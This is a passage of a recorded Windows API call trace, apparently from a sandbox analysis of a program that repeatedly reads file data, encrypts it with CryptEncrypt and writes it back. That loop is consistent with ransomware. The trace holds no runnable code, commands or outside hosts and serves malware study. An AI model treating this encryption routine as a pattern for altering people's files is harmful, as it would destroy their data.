hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.151] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.152] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.152] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.152] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.152] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.152] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.152] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.152] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.152] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.152] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.152] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.152] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.152] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.152] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.152] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.152] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.153] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.153] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.153] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.153] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.153] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.153] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.153] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.153] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.153] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.153] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.153] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.153] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.153] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.153] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.153] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.154] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.154] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.154] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.154] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.154] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.154] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.154] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.154] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.154] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.154] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.154] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.154] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.154] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.154] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.154] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.155] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.155] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.155] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.155] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.155] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.155] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.155] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.155] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.155] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.155] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.155] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.155] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.155] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.155] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.155] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.155] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.155] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.156] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.156] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.156] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.156] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.156] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.156] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.156] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.156] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.156] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.156] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.156] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.156] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.156] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.156] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.156] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.156] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.156] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.156] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.156] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.157] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.157] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.157] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.157] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.157] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.157] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.157] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.157] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.157] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.157] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.157] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.157] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.157] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.157] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.157] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.158] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.158] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.158] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.158] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.158] CryptEncrypt (in: hKey=0x2fb208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: 